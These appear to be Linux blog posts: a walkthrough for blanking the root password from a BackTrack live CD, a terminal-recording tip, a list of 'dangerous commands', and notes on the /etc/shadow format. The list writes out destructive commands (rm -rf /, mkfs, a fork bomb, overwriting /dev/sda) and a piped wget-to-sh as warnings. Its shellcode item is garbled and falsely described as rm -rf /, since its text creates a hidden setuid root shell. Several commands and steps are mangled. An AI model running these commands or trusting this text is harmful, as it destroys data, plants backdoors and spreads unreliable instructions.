Resetting root password in Linux using Backtrack

backtrack

Steps for resetting password of root to ‘sctfroot’ using backtrack.

Step1: Boot the backtrack cd and log in as root.

Step2: find the partition in which the linux is installed using cmd
$fdisk-l                                        //we are already loged in as root hence its not required to use sudo cmd anywhere.

Step3: suppose linux is installed in partition /dev/sda6 then make a directory name sda6 in mnt directory and mount that partition to it using following cmd(s)
$mkdir /mnt/sda6                             //make sda6 in mnt directory  
$mount /dev/sda6 /mnt/sda6

Step4: cd /mnt/sda6                                  //entering in sda6

Step4: change the permission of passwd file to 755
$chmod 755 passwd                             //check comments in step2

Step5: open passwd file
$vi /etc/passwd

Step6: Find root and delete the whatever is there in between the first ‘:’ and second ‘:’ and save the file.It will make the root password less.
root:x:0:0:root:/root:/bin/bash                //before

root::0:0:root:/root:/bin/bash               //after 

Step7: Now remove backtrack and restart the computer and open in grub mode(recovery mode) and you will find the root prompting at cmd line without asking for password.Now use passwd cmd to change passwd of root to sctfroot.

$passwd root
and type password as ‘sctfroot’ when it is asked.

Note: You can prevent him from hacking your sytem by setting a Bios password(so that he can’t access your system without cracking your bios password 😀 ).

Recording & playback of terminal session

Here is a simple tip to record and playback a terminal session.It is done by command script and scriptreplay.
You will find it very useful in making good tutorials.

Recording:

$ script -t 2> timing.log -a output.session
now type your commands;
…..
…..
…..
$ exit
script command here takes two files as arguments ‘timing.log(stores timing information at which each commands are run)’ and ‘output.session(stores the output of the commands)’

Playback:

$ scriptreplay timing.log output.session

Note:
timing.log and output.session can be shared with anyone who wants to replay a terminal session in their terminal.

7 Most Dangerous Commands Of Linux !!

1. rm-rf /
This is a  powerful command which deletes all files in the root directory “/” .Watch this video to know the power of this command

2. Code:

char esp [] __attribute__ ((section (. “text”))) / * esp
release * /
= “\ Xeb \ x3e \ x5b \ x31 \ xc0 \ x50 \ x54 \ x5a \ X83 \ xec \ x64 \ x68?
“\ Xff \ xff \ xff \ xff \ x68 \ xdf \ xd0 \ xdf \ xd9 \ x68 \ x8d \ x99?
“\ Xdf \ x81 \ x68 \ x8d \ x92 \ xdf \ xd2 \ x54 \ x5e \ xf7 \ x16 \ xf7?
“\ X56 \ X04 \ xf7 \ X56 \ x08 \ xf7 \ X56 \ x0c \ X83 \ xc4 \ x74 \ X56?
“\ X8d \ x73 \ x08 \ X56 \ x53 \ x54 \ X59 \ xb0 \ x0b \ xcd \ x80 \ x31?
“\ Xc0 \ x40 \ xeb \ xf9 \ xe8 \ xbd \ xff \ xff \ xff \ x2f \ x62 \ x69?
“\ X6e \ x2f \ x73 \ x68 \ x00 \ x2d \ x63 \ x00?
“Cp-p / bin / sh / tmp / .beyond; chmod 4755
/ tmp / .beyond; ”

This is the hex version of [rm-rf /] that can deceive even those not experienced users of GNU/Linux

3. mkfs.ext3 / dev / sda

This will reformat all the files on the device that is mentioned after the mkfs command.

4. :(){:|:&};:

Known as fork bomb, this command to run a large number of processes until the system freezes. It can lead to data corruption.

5. any_command> / dev / sda

This command causes total loss of data, in the partition that is mentioned in command

6. http://some_untrusted_source wget-O-| sh

Never download untrusted sources and below are implemented, they may be malicious codes

7. mv / home / yourhomedirectory / * / dev / null

This command will move all the files in your home to a place that does not exist.

[Ref: http://www.linuxpromagazine.com/online/news/seven_deadliest_linux_commands?category=13447]

Some Details on Format of /etc/shadow

Hi everyone,

I often used to wonder about the format of /etc/shadow file and with little research I came across some usefull information about it.So basically here I am going to list some of the details about the format of /etc/shadow file do read it carefully hope you will enjoy it 🙂
Test format

foo:$6$AOj8MmxF$qw5A9Y4fM0hllLHqHIMZ7KU4aY9p3gPel5ie7QsqzQp.zKRRe.ylSYP/NkErIEFi5Qhsi5WQydN3N5VB7jQR80:15502:0:99999:7:::

All fields are separated by a colon(:) symbol

User name : It is your login name
Password: It your encrypted password. The password should be minimum 6-8 characters long including special characters/digits
Last password change (lastchanged): Days since Jan 1, 1970 that password was last changed
Minimum: The minimum number of days required between password changes i.e. the number of days left before the user is allowed to change his/her password
Maximum: The maximum number of days the password is valid (after that user is forced to change his/her password)
Warn : The number of days before password is to expire that user is warned that his/her password must be changed
Inactive : The number of days after password expires that account is disabled
Expire : Days since Jan 1, 1970 that account is disabled i.e. an absolute date specifying when the login may no longer be used

The last 6 fields provides password aging and account lockout features.Password field must be filled.